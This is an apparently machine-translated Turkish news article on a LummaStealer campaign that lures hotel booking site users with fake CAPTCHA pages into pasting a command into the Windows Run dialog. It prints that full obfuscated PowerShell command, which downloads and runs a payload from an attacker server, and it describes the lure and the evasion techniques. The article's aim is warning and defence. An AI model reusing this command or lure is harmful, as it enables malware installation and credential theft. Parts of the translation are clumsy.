G verilerindeki siber güvenlik araştırmacıları, tehlikeli bir bilgi çalan kötü amaçlı yazılım olan Lummastealer’ı sunmak için sahte captcha istemlerini kullanarak gelişmiş bir kötü amaçlı yazılım kampanyası ortaya çıkardılar.
İlk olarak Ocak 2025’te keşfedilen bu ortaya çıkan tehdit, daha önce öncelikle Github veya Telegram gibi kanallara yayılan Lummastealer dağılımı için yeni bir yaklaşımı temsil ediyor.
Saldırı, belge ayrıntılarını görüntülemek için CAPTCHA doğrulaması gerektiren sahte rezervasyon onay sayfaları sunarak özellikle rezervasyon web siteleri kullanıcılarını hedeflemektedir.
Enfeksiyon, kurbanlar “hxxps: //payment-confirmation.82736 gibi kötü amaçlı URL’leri ziyaret ettiklerinde başlar.[.]Sahte rezervasyon onay sayfasına yönlendiren/pgg46 ”.
Sayfa, ikna edici bir yanılsama oluşturarak Booking.com veya HRS.com gibi meşru hizmetlerden görünen bulanık bir belge görüntüler. Bu saldırıyı özellikle aldatıcı kılan şey, birçok kullanıcının güvenlik ile ilişkilendirdiği ve bu tür tehditlere karşı muhafızlarını düşüren URL’de HTTP’lerin uygulanmasıdır.
Sözde rezervasyon ayrıntılarına erişime izin vermeden önce, sayfa ClickFix olarak bilinen sofistike bir sosyal mühendislik tekniği kullanan sahte bir Captcha doğrulaması sunar.
Tipik olarak görüntü seçmeyi gerektiren meşru captchas’ın aksine, bu kötü amaçlı sürüm, kullanıcılara Windows Run komutunu açmalarını ve otomatik olarak panosuna kopyalanmış bir komutu yapıştırmalarını söyler.
Sayfa kaynağını incelerken, güvenlik araştırmacıları başka bir URL’de barındırılan bir PHP komut dosyasından bir komut yükleyen gizlenmiş bir JavaScript keşfetti.
Komut dosyası, gerçek amacını gizlemek için ROT13 şifrelemesini kullanır, bu da kurbanın panosuna Base64 kodlu bir PowerShell komutunu kopyalamaktadır.
Bu enfeksiyon mekanizması, bilgi samanlılarının nasıl dağıtıldığı konusunda önemli bir evrimi temsil eder.
Bu saldırının küresel kapsamı genişliyor gibi görünüyor, G verileri, ilk kampanyaların Almanya’nın Münih’teki otellerine geçmeden önce Filipinler Palawan’a seyahat ettiğini belirtti ve tehdit aktörlerinin büyük olasılıkla dünya çapında kurbanları takip ettiğini gösteriyor.
Enfeksiyon zinciri
Enfeksiyon, Windows Run iletişim kutusu aracılığıyla yürütüldüğünde, saldırganın sunucusuyla iletişim kuran ve ek yükler indiren bir PowerShell komutu ile başlar.
.webp)
Komut şu şekilde görünür:-
cmd /c "powershell -w h -e aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAcwA6AC8ALwBiAG8AbwBrA GkAbgBnAC4AcAByAG8AYwBlAGQAZQBlAGQALQB2AGUAcgBpAGYAaQBjAC4AYwBvAG0ALw BpAG4ALgBwAGgAcAA/AGEAYwB0AGkAbwBuAD0AMQAnACkA" && (✓) I am not a robot - reCAPTCHA ID: 1587Bu kodlanmış komut, gerçek Lummastealer yükünü getiren ve yürüten ikincil bir PowerShell komut dosyasını indirmek için bir web isteği başlatır.
Bu kampanyada gözlemlenen kötü amaçlı yazılım örnekleri, güvenlik araçlarındaki boyut sınırlamalarını aşarak tespitten kaçınmak için ikili dolgu tekniklerinden kullanılarak önceki sürümlerden (3MB’den 9MB’a yükselir) önemli ölçüde daha büyüktür.
.webp)
Enfeksiyon zinciri akışı, saldırının ilk ziyaretten sahte bir rezervasyon sayfasına son kötü amaçlı yazılım kurulumuna kadar nasıl ilerlediğini gösterir.
.webp)
Araştırmacılar, Lummastealer örneklerinin dolaylı kontrol akışı gizleme teknikleri kullandığını ve doğrudan atlamalar veya çağrılar kullanmak yerine çalışma zamanındaki hedef adresleri dinamik olarak hesaplayarak analizi daha zor hale getirdiğini belirtiyor.
Güvenlik uzmanları, özellikle beklenmedik e -postalar yoluyla alınan rezervasyon onay bağlantılarını ziyaret ederken çok dikkatli olmayı önerir.
Meşru captchas hiçbir zaman sistem komutlarını gerektirdiğinden, captcha doğrulamaları olduğunu iddia eden web sitelerinden asla komutlar yürütmeyin.
Bu Lummastealer kampanyası, tespiti atlamak için yeni tekniklerle gelişmeye devam ettiğinden, güncellenmiş güvenlik yazılımını korumak esas devam ediyor.
Collect Threat Intelligence on the Latest Malware and Phishing Attacks with ANY.RUN TI Lookup -> Try for free